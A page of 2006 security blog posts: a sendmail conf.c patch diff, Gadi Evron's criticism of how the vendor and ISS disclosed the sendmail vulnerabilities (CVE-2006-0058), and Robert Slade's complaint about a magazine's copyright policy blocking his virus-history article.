The fix was as following:
In the file: contrib/sendmail/src/conf.c


- if (buf == NULL)
- {
- buf = buf0;
- bufsize = sizeof buf0;
- }
+ buf = buf0;
+ bufsize = sizeof buf0;

for (;;)
{
@@ -5281,8 +5278,8 @@
(void) sm_io_fprintf(smioerr, SM_TIME_DEFAULT,
"%s: %s\n", id, newstring);
#endif /* LOG */
- if (buf == buf0)
- buf = NULL;
+ if (buf != buf0)
+ sm_free(buf);
errno = save_errno;
return;
}

This advisory can be found here: http://www.securiteam.com/unixfocus/5SP0M0UI0G.html

Share

Trusting SMTP (more on SenderGate: SMTP Multiple Vulnerabilities)

oh, sorry for not mentioning earlier -
operators that want to patch sendmail, i’d suggest doing it soon. now not only do we face risk to our mail servers, but rather trusting other servers as well.

this may sound as a joke as smtp is a not trusted service with no trust in
it, but servers that employ different trust models can potentially be
compromised now.

gadi evron,
ge@beyondsecurity.com.

Share

SendGate (Sendmail vulnerabilities data)

tech details:
sendmail vulnerabilities were released yesterday. no real public announcements to speak of to the security community.

securiteam released some data:
‚Äúimproper timeout calculation, usage of memory jumps and integer overflows allow attackers to perfom a race condition dos on sendmail, and may also execute arbitrary code.‚ÄĚ
more here: http://www.securiteam.com/unixfocus/5rp0l0ui0s.html

iss only reported the race condition (dos?). the sendmail advisory reported the race condition dos, the memory jumps and a ‚Äútheoretical‚ÄĚ integer overflow.

to begin with, anyone noticed the memory leak they (sendmail) silently patched? i wonder how many other unreported silently-patched vulnerabilities are out there?

second, the integer overflow is practical, not theoretical.

iss reported the race condition last mounth. there is no data available on when the other vulnerabilities were discovered. any guesses?

they also patched many non-security related bugs, added checks and more informative error messages, etc.

sendmail is, as we know, the most used daemon for smtp in the world. this is an international infrastructure vulnerability and should have been treated that way. it wasn’t. it was handled not only poorly, but irresponsibly.

here’s what iss releasing the race condition vulnerability has to say:
http://xforce.iss.net/xforce/alerts/id/216
they say it’s a remote code execution. they say it’s a race condition. no real data available to speak of. i can’t see how it’s remotely exploitable, but well, no details, remember? from what we can see it seems like a dos.

bottom line:
what they did behind the smoke-screen is replace a lot of setjmp() and longjmp() functions (not very secure ones at that) with goto’s (interesting choice).
they changed the logic of the code, replaced everything that calculated timeout. anything that calculated something and returned a value now returns a boolean result, when previously they just returned void. they used to look at the content rather than success.

the int overflow is possibly exploitable, not very sure about the jumps. no idea why iss says the race condition is, would love insight.

public announcement:
freebsd were the only ones who released a public announcement of a patch and emailed it to bugtraq so far.

the patches:
the freebsd patch much like the sendmail.org patch is very long, complicated and obscure. the release was made along with a ton of other patches for freebsd. go figure what’s in there.

sendmail.com’s patch is so big they may as well have re-released the whole program.

there are also patches available for other *nix systems, no distributions released updates yet.

sendmail’s announcement:
obscure. not worth any other comments other than the ones above.

cve information:
cve-2006-0058 (reserved)

commentary:
one could say iss and sendmail did good, obscuring the information so that the vulnerability-to-exploit time will be longer. that proved wrong, useless and pointless. they failed.

after looking at the available data for 30 minutes (more or less), we know exactly what the vulnerabilities are. exploiting them may not be that trivial if indeed possible, but there are most likely already exploits out there if it is. when will the first public poc be released? your guess is as good as mine.
not to mention the silently patched memory leak.

smtp and sendmail by extension are critical for the internet as an international infrastructure. if this ends up being exploitable (no details, remember?) both iss and sendmail should look good and hard at the coming massive exploitation of sendmail servers.

with issues relating to the internet infrastructure i’d be willing to go even with the evil of non-disclosure, as long as something gets done and then reported publically when it finally scaled down in a roll-back after a couple of years.
if not, and you are going to make it public, make the effort and fix it as soon as you can, and give information to help the process of healing. don’t do it a mounth late and obscure data.

it took sendmail a mounth to fix this. a mounth.

a mounth!

with such vendor responsibility, perhaps it is indeed a good thing to go full disclosure. it seems like history is repeating itself and full disclosure is once again not only a choice, but necessary to make vendors become responsible.

i wish we could somehow avoid all the guys who will inevitably shout in the press “end of the world”. the internet is, was and will stay havoc. there will be exploitation. those who care about security will be patched, those that don’t will hopefully finally learn a lesson. the internet won’t die because of this, although email may suffer ‚Äď but we are used to that by now, even when losing money.

i am so very angry the details are obscure and hidden in the way they are, especially as that is useless in this case. why did they do it, to claim they are ‚Äúresponsible‚ÄĚ? too late.

“the avalanche has already started. it is too late for the pebbles to vote.” – kosh, babylon 5.

how are they to show open source is reliable if this is how they act? they hurt the cause. if they don’t know how to handle something like this, they should ask for help.

what, if it’s not reported to microsoft, there is no reason to be ‚Äúresponsible‚ÄĚ?

it’s like annoying “fake porn” on tv. either show the nudity and rate the program accordingly or stay suitable for normal viewing. there is no eating the cake and leaving it whole.

“hey mom, what’s my root password? i forgot”
“dunno, just use the new sendmail vulnerability!”

they should learn from apache. with such a critical vulnerability i know the apache guys would not have slept until it is patched!

special thanks go to ido kanner for all his help.

we will update on the situation if required on http://blogs.securiteam.com

this text can be found here: http://blogs.securiteam.com/index.php/archives/363

gadi evron,
ge@beyondsecurity.com.

Share

Copyright Gone Mad

copyright Robert M. Slade, 2006
(with that little (c) symbol thrown in for good measure)

I got asked to do a 20 year retrospective on computer viruses for a
tech magazine. (The Brain virus is thought to have been released in
1986: there is a string of “(c)1986Brain” in the body of the virus
that is presumably a copyright notice, which is highly ironic for a
number of reasons.) There were a few oddities about the request, such
as a demand for graphics. I normally don’t do graphics, but I had
such a fun time doing the article that I gave in, and finally put
together quite a piece, I thought. It was a gas going back over all
the stuff I’ve seen over the years.

You may never see it.

See, I got this phone call from the magazine today. It seems that
some of the wording in my article bears a striking resemblance to a
site on the Internet: “Robert Slade’s Computer Virus History” at

http://www.cknow.com/vtutor/RobertSladesComputerVirus.html.

This is surprising?

I’ve been writing articles, series, and books about viruses since the
darn things started. As a matter of fact, it’s a bit surprising that
they didn’t find more sites with my stuff on it, especially since
there have been dozens of examples that I’ve seen myself, over the
years, where people have used my material and passed it off as their
own.

But it seems that this outfit has a policy where they won’t publish
anything that has already appeared on the net.

I suppose that’s fair enough. Everybody is getting really antsy about
copyright violations these days, and, as somebody who does an awful
lot of writing, I suppose I should approve.

Except I don’t. The crackdown (and crankdown) on copyright and
copying is making it hard for a lot of us who are relying on our own
research and writing. After all, who else am I going to use for
material on virus history? Oh, lots of people were there, but who
else wrote it down? I do go back (and did go back, for this article)
and check on specifics, and even made corrections on items we’ve found
out more about. But, by and large, if I want to generate a decent
timeline of what happened, I have to rely very heavily on my own
stuff.

Except, now I can’t.

Well, like I said, you may not get to see the history article. Or, if
they are willing to bend their policy a bit, you might. But I’m
willing to bet that their policy is more important to them. After
all, they can always get another writer to do it for them.

Of course, in all probability he won’t know anything about the history
of viruses.

Or, he can read my stuff. And reuse it.

copyright Robert M. Slade, 2006
(with that little (c) symbol thrown in for good measure)

Share